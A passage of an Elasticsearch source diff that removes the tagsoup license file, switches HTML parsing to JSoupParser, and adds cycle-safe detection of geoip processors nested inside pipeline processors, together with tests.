Incorporated. + +Includes OSXAdapter +Copyright (C) 2003-2007 Apple, Inc., All Rights Reserved diff --git a/modules/ingest-attachment/licenses/tagsoup-LICENSE.txt b/modules/ingest-attachment/licenses/tagsoup-LICENSE.txt deleted file mode 100644 index 261eeb9e9f8b2..0000000000000 --- a/modules/ingest-attachment/licenses/tagsoup-LICENSE.txt +++ /dev/null @@ -1,201 +0,0 @@ - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). 
- - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. 
You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. 
In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. 
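The TikaImpl change below swaps the tagsoup-backed HtmlParser for Tika's JSoupParser. As a rough illustration of what that parser does with HTML input, here is a minimal sketch, assuming the standard Tika 3.x Parser API; the helper class and sample input are illustrative and not part of this patch:

import org.apache.tika.metadata.Metadata;
import org.apache.tika.parser.ParseContext;
import org.apache.tika.parser.html.JSoupParser;
import org.apache.tika.sax.BodyContentHandler;

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

class JsoupHtmlSketch {
    // Parse HTML with Tika's JSoupParser and collect the extracted body text.
    static String htmlToText(String html) throws Exception {
        BodyContentHandler handler = new BodyContentHandler(-1); // -1 disables the default write limit
        new JSoupParser().parse(
            new ByteArrayInputStream(html.getBytes(StandardCharsets.UTF_8)),
            handler,
            new Metadata(),
            new ParseContext()
        );
        return handler.toString(); // plain text extracted from the markup
    }
}

The extraction contract is unchanged; jsoup simply replaces tagsoup as the lenient HTML parser underneath, which is why the dependency, license files, and the TikaImpl import below all move in lockstep.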
diff --git a/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java b/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java index c057d17576c0a..f83768784d3cd 100644 --- a/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java +++ b/modules/ingest-attachment/src/main/java/org/elasticsearch/ingest/attachment/TikaImpl.java @@ -16,6 +16,7 @@ import org.apache.tika.parser.AutoDetectParser; import org.apache.tika.parser.Parser; import org.apache.tika.parser.ParserDecorator; +import org.apache.tika.parser.html.JSoupParser; import java.io.ByteArrayInputStream; import java.io.IOException; @@ -46,7 +47,7 @@ final class TikaImpl { /** subset of parsers for types we support */ private static final Parser PARSERS[] = new Parser[] { // documents - new org.apache.tika.parser.html.HtmlParser(), + new JSoupParser(), new org.apache.tika.parser.microsoft.rtf.RTFParser(), new org.apache.tika.parser.pdf.PDFParser(), new org.apache.tika.parser.txt.TXTParser(), diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java index 47dd3d86e9983..0efe509475ecf 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpCache.java @@ -17,7 +17,7 @@ import org.elasticsearch.ingest.geoip.stats.CacheStats; import java.nio.file.Path; -import java.util.concurrent.atomic.AtomicLong; +import java.util.concurrent.atomic.LongAdder; import java.util.function.Function; import java.util.function.LongSupplier; @@ -44,8 +44,8 @@ public String toString() { private final LongSupplier relativeNanoTimeProvider; private final Cache cache; - private final AtomicLong hitsTimeInNanos = new AtomicLong(0); - private final AtomicLong missesTimeInNanos = new AtomicLong(0); + private final LongAdder hitsTimeInNanos = new LongAdder(); + private final LongAdder missesTimeInNanos = new LongAdder(); // package private for testing GeoIpCache(long maxSize, LongSupplier relativeNanoTimeProvider) { @@ -80,9 +80,9 @@ RESPONSE putIfAbsent(ProjectId projectId, String ip, String databaseP // store the result or no-result in the cache cache.put(cacheKey, response); long databaseRequestAndCachePutTime = relativeNanoTimeProvider.getAsLong() - retrieveStart; - missesTimeInNanos.addAndGet(cacheRequestTime + databaseRequestAndCachePutTime); + missesTimeInNanos.add(cacheRequestTime + databaseRequestAndCachePutTime); } else { - hitsTimeInNanos.addAndGet(cacheRequestTime); + hitsTimeInNanos.add(cacheRequestTime); } if (response == NO_RESULT) { @@ -126,8 +126,8 @@ public CacheStats getCacheStats() { stats.getHits(), stats.getMisses(), stats.getEvictions(), - TimeValue.nsecToMSec(hitsTimeInNanos.get()), - TimeValue.nsecToMSec(missesTimeInNanos.get()) + TimeValue.nsecToMSec(hitsTimeInNanos.sum()), + TimeValue.nsecToMSec(missesTimeInNanos.sum()) ); } diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java index 087a5b4e6296c..6d55e94b0a23d 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutor.java @@ -21,6 +21,7 @@ import 
org.elasticsearch.cluster.ClusterChangedEvent; import org.elasticsearch.cluster.ClusterStateListener; import org.elasticsearch.cluster.metadata.IndexAbstraction; +import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.cluster.metadata.ProjectMetadata; import org.elasticsearch.cluster.node.DiscoveryNode; @@ -47,6 +48,7 @@ import org.elasticsearch.transport.RemoteTransportException; import java.util.Collections; +import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; @@ -280,11 +282,14 @@ static boolean hasAtLeastOneGeoipProcessor(ProjectMetadata projectMetadata) { return false; } - return projectMetadata.indices().values().stream().anyMatch(indexMetadata -> { + for (IndexMetadata indexMetadata : projectMetadata.indices().values()) { String defaultPipeline = IndexSettings.DEFAULT_PIPELINE.get(indexMetadata.getSettings()); String finalPipeline = IndexSettings.FINAL_PIPELINE.get(indexMetadata.getSettings()); - return checkReferencedPipelines.contains(defaultPipeline) || checkReferencedPipelines.contains(finalPipeline); - }); + if (checkReferencedPipelines.contains(defaultPipeline) || checkReferencedPipelines.contains(finalPipeline)) { + return true; + } + } + return false; } /** @@ -297,12 +302,26 @@ static boolean hasAtLeastOneGeoipProcessor(ProjectMetadata projectMetadata) { @SuppressWarnings("unchecked") private static Set pipelinesWithGeoIpProcessor(ProjectMetadata projectMetadata, boolean downloadDatabaseOnPipelineCreation) { List configurations = IngestService.getPipelines(projectMetadata); + Map pipelineConfigById = HashMap.newHashMap(configurations.size()); + for (PipelineConfiguration configuration : configurations) { + pipelineConfigById.put(configuration.getId(), configuration); + } + // this map is used to keep track of pipelines that have already been checked + Map pipelineHasGeoProcessorById = HashMap.newHashMap(configurations.size()); Set ids = new HashSet<>(); // note: this loop is unrolled rather than streaming-style because it's hot enough to show up in a flamegraph for (PipelineConfiguration configuration : configurations) { List> processors = (List>) configuration.getConfig().get(Pipeline.PROCESSORS_KEY); - if (hasAtLeastOneGeoipProcessor(processors, downloadDatabaseOnPipelineCreation)) { - ids.add(configuration.getId()); + String pipelineName = configuration.getId(); + if (pipelineHasGeoProcessorById.containsKey(pipelineName) == false) { + if (hasAtLeastOneGeoipProcessor( + processors, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + )) { + ids.add(pipelineName); + } } } return Collections.unmodifiableSet(ids); @@ -312,13 +331,27 @@ private static Set pipelinesWithGeoIpProcessor(ProjectMetadata projectMe * Check if a list of processor contains at least a geoip processor. * @param processors List of processors. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. 
*/ - private static boolean hasAtLeastOneGeoipProcessor(List> processors, boolean downloadDatabaseOnPipelineCreation) { + private static boolean hasAtLeastOneGeoipProcessor( + List> processors, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { if (processors != null) { // note: this loop is unrolled rather than streaming-style because it's hot enough to show up in a flamegraph for (Map processor : processors) { - if (hasAtLeastOneGeoipProcessor(processor, downloadDatabaseOnPipelineCreation)) { + if (hasAtLeastOneGeoipProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + )) { return true; } } @@ -330,10 +363,19 @@ private static boolean hasAtLeastOneGeoipProcessor(List> pro * Check if a processor config is a geoip processor or contains at least a geoip processor. * @param processor Processor config. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. */ @SuppressWarnings("unchecked") - private static boolean hasAtLeastOneGeoipProcessor(Map processor, boolean downloadDatabaseOnPipelineCreation) { + private static boolean hasAtLeastOneGeoipProcessor( + Map processor, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { if (processor == null) { return false; } @@ -352,27 +394,51 @@ private static boolean hasAtLeastOneGeoipProcessor(Map processor } } - return isProcessorWithOnFailureGeoIpProcessor(processor, downloadDatabaseOnPipelineCreation) - || isForeachProcessorWithGeoipProcessor(processor, downloadDatabaseOnPipelineCreation); + return isProcessorWithOnFailureGeoIpProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ) + || isForeachProcessorWithGeoipProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ) + || isPipelineProcessorWithGeoIpProcessor( + processor, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ); } /** * Check if a processor config has an on_failure clause containing at least a geoip processor. * @param processor Processor config. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. 
*/ @SuppressWarnings("unchecked") private static boolean isProcessorWithOnFailureGeoIpProcessor( Map processor, - boolean downloadDatabaseOnPipelineCreation + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById ) { // note: this loop is unrolled rather than streaming-style because it's hot enough to show up in a flamegraph for (Object value : processor.values()) { if (value instanceof Map && hasAtLeastOneGeoipProcessor( ((Map>>) value).get("on_failure"), - downloadDatabaseOnPipelineCreation + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById )) { return true; } @@ -384,13 +450,84 @@ && hasAtLeastOneGeoipProcessor( * Check if a processor is a foreach processor containing at least a geoip processor. * @param processor Processor config. * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). * @return true if a geoip processor is found in the processor list. */ @SuppressWarnings("unchecked") - private static boolean isForeachProcessorWithGeoipProcessor(Map processor, boolean downloadDatabaseOnPipelineCreation) { + private static boolean isForeachProcessorWithGeoipProcessor( + Map processor, + boolean downloadDatabaseOnPipelineCreation, + Map pipelineConfigById, + Map pipelineHasGeoProcessorById + ) { final Map processorConfig = (Map) processor.get("foreach"); return processorConfig != null - && hasAtLeastOneGeoipProcessor((Map) processorConfig.get("processor"), downloadDatabaseOnPipelineCreation); + && hasAtLeastOneGeoipProcessor( + (Map) processorConfig.get("processor"), + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ); + } + + /** + * Check if a processor is a pipeline processor containing at least a geoip processor. This method also updates + * pipelineHasGeoProcessorById with a result for any pipelines it looks at. + * @param processor Processor config. + * @param downloadDatabaseOnPipelineCreation Should the download_database_on_pipeline_creation of the geoip processor be true or false. + * @param pipelineConfigById A Map of pipeline id to PipelineConfiguration + * @param pipelineHasGeoProcessorById A Map of pipeline id to Boolean, indicating whether the pipeline references a geoip processor + * (true), does not reference a geoip processor (false), or we are currently trying to figure that + * out (null). + * @return true if this processor is a pipeline processor and a geoip processor is found in the pipeline it references.
+ */ + @SuppressWarnings("unchecked") + private static boolean isPipelineProcessorWithGeoIpProcessor( + Map<String, Object> processor, + boolean downloadDatabaseOnPipelineCreation, + Map<String, PipelineConfiguration> pipelineConfigById, + Map<String, Boolean> pipelineHasGeoProcessorById + ) { + final Map<String, Object> processorConfig = (Map<String, Object>) processor.get("pipeline"); + if (processorConfig != null) { + String pipelineName = (String) processorConfig.get("name"); + if (pipelineName != null) { + if (pipelineHasGeoProcessorById.containsKey(pipelineName)) { + if (pipelineHasGeoProcessorById.get(pipelineName) == null) { + /* + * If the value is null here, it indicates that this method has been called recursively with the same pipeline name. + * This will cause a runtime error when the pipeline is executed, but we're avoiding changing existing behavior at + * server startup time. Instead, we just bail out as quickly as possible. It is possible that this could lead to a + * geo database not being downloaded for the pipeline, but it doesn't really matter since the pipeline was going to + * fail anyway. + */ + pipelineHasGeoProcessorById.put(pipelineName, false); + } + } else { + List<Map<String, Object>> childProcessors = null; + PipelineConfiguration config = pipelineConfigById.get(pipelineName); + if (config != null) { + childProcessors = (List<Map<String, Object>>) config.getConfig().get(Pipeline.PROCESSORS_KEY); + } + // We initialize this to null so that we know it's in progress and can use it to avoid stack overflow errors: + pipelineHasGeoProcessorById.put(pipelineName, null); + pipelineHasGeoProcessorById.put( + pipelineName, + hasAtLeastOneGeoipProcessor( + childProcessors, + downloadDatabaseOnPipelineCreation, + pipelineConfigById, + pipelineHasGeoProcessorById + ) + ); + } + return pipelineHasGeoProcessorById.get(pipelineName); + } + } + return false; } // starts GeoIP downloader task for a single project diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java index 667ffb82a9640..e980b05797ce8 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskParams.java @@ -10,7 +10,6 @@ package org.elasticsearch.ingest.geoip; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.persistent.PersistentTaskParams; @@ -44,7 +43,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java index 4014291cfaf6b..98e343975db3b 100644 --- a/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java +++ b/modules/ingest-geoip/src/main/java/org/elasticsearch/ingest/geoip/GeoIpTaskState.java @@ -132,7 +132,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override
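The null entries in pipelineHasGeoProcessorById above are memoized cycle detection over the pipeline-processor graph. Below is a minimal, self-contained sketch of the same tri-state idea; the names (CycleTolerantGeoCheck, CALLS, referencesGeo) are illustrative only and not part of the Elasticsearch code:

import java.util.HashMap;
import java.util.List;
import java.util.Map;

class CycleTolerantGeoCheck {
    // Hypothetical pipeline graph: each pipeline lists the pipelines it calls via pipeline processors.
    static final Map<String, List<String>> CALLS = Map.of(
        "outer", List.of("inner"),
        "inner", List.of("innerInner"),
        "innerInner", List.of("inner") // cycle: inner -> innerInner -> inner
    );

    static boolean referencesGeo(String id, Map<String, Boolean> cache) {
        if (cache.containsKey(id)) {
            Boolean known = cache.get(id);
            return known != null && known; // null means "in progress", i.e. a cycle: bail out with false
        }
        cache.put(id, null); // mark in progress before recursing
        boolean result = CALLS.getOrDefault(id, List.of()).stream().anyMatch(child -> referencesGeo(child, cache));
        cache.put(id, result); // overwrite the in-progress marker with the real answer
        return result;
    }

    public static void main(String[] args) {
        System.out.println(referencesGeo("outer", new HashMap<>())); // false, and no StackOverflowError
    }
}

Marking an id as null before recursing means any re-entrant lookup for the same id must sit on a cycle, so it can answer false immediately instead of overflowing the stack; the real answer then overwrites the marker as the recursion unwinds.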
diff --git a/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java index eccc29d22277f..09eb7fb65585d 100644 --- a/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java +++ b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/GeoIpDownloaderTaskExecutorTests.java @@ -52,6 +52,101 @@ public void testHasAtLeastOneGeoipProcessorWhenDownloadDatabaseOnPipelineCreatio } + /* + * This tests that if a default or final pipeline has a pipeline processor that has a geoip processor that has + * download_database_on_pipeline_creation set to false, then we will correctly acknowledge that the pipeline has a geoip processor so + * that we download it appropriately. + */ + public void testHasAtLeastOneGeoipProcessorInPipelineProcessorWhenDownloadDatabaseOnPipelineCreationIsFalse() throws IOException { + String innerInnerPipelineJson = """ + { + "processors":[""" + getGeoIpProcessor(false) + """ + ] + } + """; + String innerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerInnerPipeline"}} + ] + } + """; + String outerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerPipeline"}} + ] + } + """; + IngestMetadata ingestMetadata = new IngestMetadata( + Map.of( + "innerInnerPipeline", + new PipelineConfiguration("innerInnerPipeline", new BytesArray(innerInnerPipelineJson), XContentType.JSON), + "innerPipeline", + new PipelineConfiguration("innerPipeline", new BytesArray(innerPipelineJson), XContentType.JSON), + "outerPipeline", + new PipelineConfiguration("outerPipeline", new BytesArray(outerPipelineJson), XContentType.JSON) + ) + ); + // The pipeline is not used in any index, expected to return false. + var projectMetadata = projectMetadataWithIndex(b -> {}, ingestMetadata); + assertFalse(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as default pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.DEFAULT_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as final pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.FINAL_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + } + + public void testHasAtLeastOneGeoipProcessorRecursion() throws IOException { + /* + * The pipeline in this test is invalid -- it has a cycle from outerPipeline -> innerPipeline -> innerInnerPipeline -> + * innerPipeline. Since this method is called at server startup, we want to make sure that we don't get a StackOverflowError and + * that we don't throw any kind of validation exception (since that would be an unexpected change of behavior).
+ */ + String innerInnerPipelineJson = """ + { + "processors":[""" + getGeoIpProcessor(false) + """ + , {"pipeline": {"name": "innerPipeline"}} + ] + } + """; + String innerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerInnerPipeline"}} + ] + } + """; + String outerPipelineJson = """ + { + "processors":[{"pipeline": {"name": "innerPipeline"}} + ] + } + """; + IngestMetadata ingestMetadata = new IngestMetadata( + Map.of( + "innerInnerPipeline", + new PipelineConfiguration("innerInnerPipeline", new BytesArray(innerInnerPipelineJson), XContentType.JSON), + "innerPipeline", + new PipelineConfiguration("innerPipeline", new BytesArray(innerPipelineJson), XContentType.JSON), + "outerPipeline", + new PipelineConfiguration("outerPipeline", new BytesArray(outerPipelineJson), XContentType.JSON) + ) + ); + // The pipeline is not used in any index, expected to return false. + var projectMetadata = projectMetadataWithIndex(b -> {}, ingestMetadata); + assertFalse(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as default pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.DEFAULT_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + + // The pipeline is set as final pipeline in an index, expected to return true. + projectMetadata = projectMetadataWithIndex(b -> b.put(IndexSettings.FINAL_PIPELINE.getKey(), "outerPipeline"), ingestMetadata); + assertTrue(GeoIpDownloaderTaskExecutor.hasAtLeastOneGeoipProcessor(projectMetadata)); + } + public void testHasAtLeastOneGeoipProcessor() throws IOException { var projectId = Metadata.DEFAULT_PROJECT_ID; List expectHitsInputs = getPipelinesWithGeoIpProcessors(true); diff --git a/modules/ingest-geoip/src/internalClusterTest/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsIT.java b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsTests.java similarity index 99% rename from modules/ingest-geoip/src/internalClusterTest/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsIT.java rename to modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsTests.java index c65d9a2dc2009..7f298038141df 100644 --- a/modules/ingest-geoip/src/internalClusterTest/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsIT.java +++ b/modules/ingest-geoip/src/test/java/org/elasticsearch/ingest/geoip/ReloadingDatabasesWhilePerformingGeoLookupsTests.java @@ -57,7 +57,7 @@ // 'WindowsFS.checkDeleteAccess(...)'). 
